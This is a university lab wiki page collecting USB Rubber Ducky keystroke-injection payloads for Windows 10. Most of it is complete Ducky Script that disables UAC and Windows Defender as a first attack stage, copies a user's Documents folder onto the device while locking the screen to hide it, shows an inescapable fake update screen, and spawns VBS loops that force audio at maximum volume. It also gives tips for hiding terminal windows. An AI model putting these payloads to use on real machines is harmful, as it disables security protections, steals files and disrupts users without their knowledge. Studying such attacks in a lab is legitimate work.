USB Rubber Ducky: Payloads

From Embedded Lab Vienna for IoT & Security
Revision as of 06:18, 8 July 2022 by BVogler (talk | contribs) (minor corrections)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Summary

In this documentation we will show you examples for the usage of the USB Rubber Ducky on Windows 10 hosts. There are many of ready-made Ducky Scripts found at:

Requirements

Description

All scripts have a DELAY 3000 at the start which means a delay of 30000ms / 30s to make sure that the target PC has time to set up the HID driver. This can potentially be reduced to DELAY 1000 depending on the target host. The scripts could be further improved by adding obfuscation methods to the code. Terminal windows can be changed in colour and size to make them less obvious and much harder to read. USB Rubber Ducky can also be used to play harmless pranks on your colleagues and friends. Just be sure to clue them in beforehand and don’t let them panic.

Hello World!

Firmware: Duck (Original)

Like in all programming languages a basic hello world can be used to get to know the basic functionalities of the system. The following code is used to make a Windows PC open notepad, write “Hello World!” in large letters and save the file to the default directory. 

DELAY 3000
GUI d
DELAY 2000
GUI r
DELAY 500
STRING c:\windows\notepad.exe
ENTER
DELAY 1000
ALT o
STRING f
TAB
TAB
STRING 100
ENTER
STRING Hello World!
CTRL s
STRING totallynotavirus.txt
ENTER

Disable Windows Defender

Firmware: Duck (Original)

This script is used to disable Windows User Account Control first and then disable all functionalities of the Windows Defender. This could be potentially used to prepare for a second stage of a multi-stage attack. It makes heavy use of menu navigation (Arrow keys, Tabs) and the Windows 10 Search menu. The value of the DELAY commands could be further reduced if used on a fast target host. Note that the script leaves no open windows after concluding its actions. 

DELAY 3000
REM Disabling User Account Control
CTRL ESC
DELAY 200
STRING uac
DELAY 200
ENTER
DELAY 500
LEFT
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 500
LEFT
DELAY 200
ENTER
DELAY 1000
REM Disabling Windows Defender
CTRL ESC
DELAY 200
STRING virus pro
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
ALT F4

Copy Documents Folder to Ducky

Firmware: Twin Duck

Before using this script, the USB Rubber Ducky must be updated with the Twin Duck firmware. Using this firmware, the Rubber Ducky acts both as a HID keyboard and a USB storage device. The script uses the Windows Run application to open the Documents directory and copies all its contents to the storage portion of the Ducky. Note that this script assumes that the storage device will be assigned the drive letter D and must be adjusted if reconnaissance shows another letter would be more likely. The script ends with locking the screen to better hide the copying process. 

DELAY 3000
GUI d
DELAY 300
GUI r
DELAY 100
STRING documents
DELAY 100
ENTER
DELAY 100
CTRL a
DELAY 100
CTRL c
DELAY 100
ALT F4
DELAY 100
GUI r
DELAY 300
STRING d:\
DELAY 100
ENTER
DELAY 100
CTRL v
DELAY 100
GUI D
DELAY 100
GUI l

Fake Update Screen

Firmware: Duck (Original)

This script launches a website that fakes the Windows update screen in the systems default internet browser and sets it to Fullscreen mode. It can’t be easily exited by hitting the Escape-key and hitting the Enter-key results in a fake bluescreen. 

DELAY 3000
GUI d
DELAY 200
GUI r
DELAY 200
STRING https://www.fakeupdate.net/win10ue/
ENTER
DELAY 500
F11

Maximum Volume Autoplay Audio

Firmware: Duck (Original)

This script showcases how Ducky Script can use the console to create Visual Basic Script files (*.vbs) that can be used to create endless loops of code. It uses the command copy con to create two script files. The first script file is used to create a Windows Media Player object to play a sound file from start to finish from a provided online source. The second script creates a Windows Script Host Shell object that gives the “Volume Up”-command in an endless loop. The only way to end these scripts is by using the task manager or by restarting the system. 

DELAY 3000
GUI d
DELAY 200
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 500
STRING del %tmp%\rickyou.vbs
ENTER
DELAY 200
STRING del %tmp%\volup.vbs
ENTER
DELAY 200
STRING cd %tmp% && copy con rickyou.vbs
ENTER
STRING While true
ENTER
STRING Dim oPlayer
ENTER
STRING Set oPlayer = CreateObject("WMPlayer.OCX")
ENTER
STRING oPlayer.URL = "http://tinyurl.com/s63ve48"
ENTER
STRING oPlayer.controls.play
ENTER
STRING While oPlayer.playState <> 1 ' 1 = Stopped
ENTER
STRING WScript.Sleep 100
ENTER
STRING Wend
ENTER
STRING oPlayer.close
ENTER
STRING Wend
ENTER
DELAY 100
CTRL z
ENTER
STRING copy con volup.vbs
ENTER
STRING do
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.SendKeys(chr(&hAF))
ENTER
STRING loop
ENTER
CTRL z
ENTER
STRING start rickyou.vbs && volup.vbs
ENTER
STRING exit
ENTER

Used Hardware

  • USB Rubber Ducky
  • Windows 10 PC
  • Ubuntu Linux 20.04 Virtual Machine

References

Retrieved from "https://wiki.elvis.science/index.php?title=USB_Rubber_Ducky:_Payloads&oldid=10244"